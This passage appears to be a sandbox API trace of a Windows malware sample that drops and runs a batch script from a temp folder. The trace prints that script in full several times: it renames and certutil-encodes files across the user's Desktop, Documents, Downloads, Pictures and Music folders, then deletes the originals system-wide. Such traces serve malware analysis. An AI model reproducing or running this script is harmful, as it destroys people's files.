%UserProFile%\\Pictures\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Documents\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Music\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %SystemDrive%\\\r\n\r\ndel /s /q *.Sister\r\n\r\necho TVqQAAMAAAAEAAAA/9OtNBjEDy9CjXs8kMWBrU=\r\n-----END CERTIFICATE-----\r\n\r\n:1\r\n\r\ndel %0") returned 0x4fd [0082.915] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xa04) returned 0x241acc8 [0082.915] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x8, Size=0x28) returned 0x22b10b0 [0082.915] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0082.916] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x1000) returned 0x22b10e0 [0082.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@shift /0\r\nREM\r\n\r\ncd %SystemDrive%\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Desktop\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Downloads\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Pictures\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Documents\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Music\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %SystemDrive%\\\r\n\r\ndel /s /q *.Sister\r\n\r\necho TVqQAAMAAAAEAAAA/9OtNBjEDy9CjXs8kMWBrU=\r\n-----END CERTIFICATE-----\r\n\r\n:1\r\n\r\ndel %0", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1278 [0082.916] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x4ff) returned 0x22b20e8 [0082.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@shift /0\r\nREM\r\n\r\ncd %SystemDrive%\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Desktop\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Downloads\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Pictures\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Documents\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Music\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %SystemDrive%\\\r\n\r\ndel /s /q *.Sister\r\n\r\necho TVqQAAMAAAAEAAAA/9OtNBjEDy9CjXs8kMWBrU=\r\n-----END CERTIFICATE-----\r\n\r\n:1\r\n\r\ndel %0", cchWideChar=-1, lpMultiByteStr=0x22b20e8, cbMultiByte=1278, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@shift /0\r\nREM\r\n\r\ncd %SystemDrive%\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Desktop\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Downloads\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Pictures\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Documents\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Music\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %SystemDrive%\\\r\n\r\ndel /s /q *.Sister\r\n\r\necho TVqQAAMAAAAEAAAA/9OtNBjEDy9CjXs8kMWBrU=\r\n-----END CERTIFICATE-----\r\n\r\n:1\r\n\r\ndel %0", lpUsedDefaultChar=0x0) returned 1278 [0082.916] SetFilePointer (in: hFile=0x7c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19feac*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19feac*=0) returned 0x0 [0082.916] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b20e8 | out: hHeap=0x22b0000) returned 1 [0082.916] WriteFile (in: hFile=0x7c, lpBuffer=0x22b10e0*, nNumberOfBytesToWrite=0x4fd, lpNumberOfBytesWritten=0x19fec8, lpOverlapped=0x0 | out: lpBuffer=0x22b10e0*, lpNumberOfBytesWritten=0x19fec8*=0x4fd, lpOverlapped=0x0) returned 1 [0082.952] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b10e0 | out: hHeap=0x22b0000) returned 1 [0082.952] CloseHandle (hObject=0x7c) returned 1 [0082.956] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b10b0 | out: hHeap=0x22b0000) returned 1 [0082.956] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x241ac38 | out: hHeap=0x2410000) returned 1 [0082.957] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x241acc8 | out: hHeap=0x2410000) returned 1 [0082.957] GetLastError () returned 0x0 [0082.957] SetLastError (dwErrCode=0x0) [0082.957] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2418320 | out: hHeap=0x2410000) returned 1 [0082.957] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2418da0 | out: hHeap=0x2410000) returned 1 [0082.957] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x241a170 | out: hHeap=0x2410000) returned 1 [0082.957] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x241a1d8 | out: hHeap=0x2410000) returned 1 [0082.957] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x24176d8 | out: hHeap=0x2410000) returned 1 [0082.957] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x241a108 | out: hHeap=0x2410000) returned 1 [0082.957] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x241a240 | out: hHeap=0x2410000) returned 1 [0082.957] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x241a0a0 | out: hHeap=0x2410000) returned 1 [0082.957] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2417738 | out: hHeap=0x2410000) returned 1 [0082.957] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2417858 | out: hHeap=0x2410000) returned 1 [0082.957] GetLastError () returned 0x0 [0082.957] SetLastError (dwErrCode=0x0) [0082.957] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat") returned 0x3d [0082.957] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x84) returned 0x241a0a0 [0082.957] PathQuoteSpacesW (in: lpsz="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" | out: lpsz="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat") returned 0 [0082.957] GetLastError () returned 0x0 [0082.957] SetLastError (dwErrCode=0x0) [0082.957] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat") returned 0x3d [0082.958] wcslen (_String=" ") returned 0x1 [0082.958] wcslen (_String="\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\"") returned 0x4f [0082.958] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2419ff0, Size=0x124) returned 0x241a130 [0082.958] PathQuoteSpacesW (in: lpsz="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\"" | out: lpsz="\"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\"\"") returned 1 [0082.958] wcslen (_String="4DE237AD17CDF9EA9D31BEEBC81890A8") returned 0x20 [0082.958] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x4a) returned 0x2418168 [0082.958] GetLastError () returned 0x0 [0082.958] SetLastError (dwErrCode=0x0) [0082.958] GetLastError () returned 0x0 [0082.958] SetLastError (dwErrCode=0x0) [0082.958] GetLastError () returned 0x0 [0082.958] SetLastError (dwErrCode=0x0) [0082.958] GetLastError () returned 0x0 [0082.958] SetLastError (dwErrCode=0x0) [0082.958] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x9c) returned 0x22b10b0 [0082.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="4DE237AD17CDF9EA9D31BEEBC81890A8", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0082.958] malloc (_Size=0x22) returned 0x9b1150 [0082.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="4DE237AD17CDF9EA9D31BEEBC81890A8", cchWideChar=33, lpMultiByteStr=0x9b1150, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4DE237AD17CDF9EA9D31BEEBC81890A8", lpUsedDefaultChar=0x0) returned 33 [0082.959] free (_Block=0x9b1150) [0082.959] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b10b0 | out: hHeap=0x22b0000) returned 1 [0082.959] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x4a) returned 0x24187f0 [0082.959] FindResourceW (hModule=0x400000, lpName="864FE41279E142C933EB188344BA8835", lpType=0xa) returned 0x0 [0082.959] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2418168 | out: hHeap=0x2410000) returned 1 [0082.959] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x24187f0 | out: hHeap=0x2410000) returned 1 [0082.959] GetLastError () returned 0x716 [0082.959] SetLastError (dwErrCode=0x716) [0082.959] GetLastError () returned 0x716 [0082.959] SetLastError (dwErrCode=0x716) [0082.959] wcslen (_String="/c") returned 0x2 [0082.959] wcslen (_String=" ") returned 0x1 [0082.959] wcslen (_String="\"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\"\"") returned 0x8f [0082.960] GetLastError () returned 0x0 [0082.960] SetLastError (dwErrCode=0x0) [0082.960] GetLastError () returned 0x0 [0082.960] SetLastError (dwErrCode=0x0) [0082.960] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x241072e | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0082.960] GetLastError () returned 0x0 [0082.960] SetLastError (dwErrCode=0x0) [0082.960] wcslen (_String="C:\\WINDOWS\\sysnative\\") returned 0x15 [0082.960] wcslen (_String="cmd") returned 0x3 [0082.960] wcslen (_String="C:\\WINDOWS\\sysnative\\cmd") returned 0x18 [0082.960] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x3a) returned 0x2419368 [0082.960] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\") returned 0x18 [0082.960] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x3a) returned 0x24193f8 [0082.960] wcslen (_String="/c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\"\"") returned 0x92 [0082.960] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x12e) returned 0x241a260 [0082.961] ShellExecuteExW (in: pExecInfo=0x19fee0*(cbSize=0x3c, fMask=0x140, hwnd=0x0, lpVerb="open", lpFile="C:\\WINDOWS\\sysnative\\cmd", lpParameters="/c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\"\"", lpDirectory="C:\\Users\\FD1HVy\\Desktop\\", nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x19fee0*(cbSize=0x3c, fMask=0x140, hwnd=0x0, lpVerb="open", lpFile="C:\\WINDOWS\\sysnative\\cmd", lpParameters="/c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\"\"", lpDirectory="C:\\Users\\FD1HVy\\Desktop\\", nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x40c)) returned 1 [0091.496] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0091.497] Sleep (dwMilliseconds=0x19) [0091.537] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0091.537] Sleep (dwMilliseconds=0x19) [0091.630] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0091.630] Sleep (dwMilliseconds=0x19) [0091.680] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0091.680] Sleep (dwMilliseconds=0x19) [0091.781] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0091.782] Sleep (dwMilliseconds=0x19) [0091.846] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0091.846] Sleep (dwMilliseconds=0x19) [0091.932] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0091.932] Sleep (dwMilliseconds=0x19) [0092.070] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0092.070] Sleep (dwMilliseconds=0x19) [0092.117] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0092.141] Sleep (dwMilliseconds=0x19) [0092.213] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0092.213] Sleep (dwMilliseconds=0x19) [0092.272] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0092.272] Sleep (dwMilliseconds=0x19) [0092.366] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0092.366] Sleep (dwMilliseconds=0x19) [0092.463] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0092.463] Sleep (dwMilliseconds=0x19) [0092.533] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0092.533] Sleep (dwMilliseconds=0x19) [0094.224] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0094.224] Sleep (dwMilliseconds=0x19) [0094.325] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0094.325] Sleep (dwMilliseconds=0x19) [0094.371] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0094.371] Sleep (dwMilliseconds=0x19) [0094.425] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0094.425] Sleep (dwMilliseconds=0x19) [0094.527] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0094.527] Sleep (dwMilliseconds=0x19) [0094.609] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0094.609] Sleep (dwMilliseconds=0x19) [0094.864] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0094.864] Sleep (dwMilliseconds=0x19) [0096.286] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0096.286] Sleep (dwMilliseconds=0x19) [0096.912] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0096.912] Sleep (dwMilliseconds=0x19) [0097.008] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.009] Sleep (dwMilliseconds=0x19) [0097.048] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.048] Sleep (dwMilliseconds=0x19) [0097.088] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.088] Sleep (dwMilliseconds=0x19) [0097.128] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.128] Sleep (dwMilliseconds=0x19) [0097.185] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.185] Sleep (dwMilliseconds=0x19) [0097.251] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.251] Sleep (dwMilliseconds=0x19) [0097.286] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.287] Sleep (dwMilliseconds=0x19) [0097.573] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.574] Sleep (dwMilliseconds=0x19) [0097.608] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.608] Sleep (dwMilliseconds=0x19) [0097.679] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.679] Sleep (dwMilliseconds=0x19) [0097.723] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.724] Sleep (dwMilliseconds=0x19) [0097.758] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.758] Sleep (dwMilliseconds=0x19) [0097.795] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.796] Sleep (dwMilliseconds=0x19) [0097.831] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.831] Sleep (dwMilliseconds=0x19) [0097.858] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.858] Sleep (dwMilliseconds=0x19) [0097.893] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.893] Sleep (dwMilliseconds=0x19) [0097.920] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.920] Sleep (dwMilliseconds=0x19) [0097.946] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.946] Sleep (dwMilliseconds=0x19) [0097.972] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.972] Sleep (dwMilliseconds=0x19) [0097.998] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0097.998] Sleep (dwMilliseconds=0x19) [0098.026] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.026] Sleep (dwMilliseconds=0x19) [0098.052] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.052] Sleep (dwMilliseconds=0x19) [0098.079] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.079] Sleep (dwMilliseconds=0x19) [0098.108] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.108] Sleep (dwMilliseconds=0x19) [0098.134] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.134] Sleep (dwMilliseconds=0x19) [0098.160] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.160] Sleep (dwMilliseconds=0x19) [0098.187] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.187] Sleep (dwMilliseconds=0x19) [0098.213] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.213] Sleep (dwMilliseconds=0x19) [0098.240] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.240] Sleep (dwMilliseconds=0x19) [0098.267] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.267] Sleep (dwMilliseconds=0x19) [0098.293] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.293] Sleep (dwMilliseconds=0x19) [0098.319] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.319] Sleep (dwMilliseconds=0x19) [0098.348] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.348] Sleep (dwMilliseconds=0x19) [0098.374] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.374] Sleep (dwMilliseconds=0x19) [0098.400] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.400] Sleep (dwMilliseconds=0x19) [0098.457] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.457] Sleep (dwMilliseconds=0x19) [0098.484] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.484] Sleep (dwMilliseconds=0x19) [0098.510] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.511] Sleep 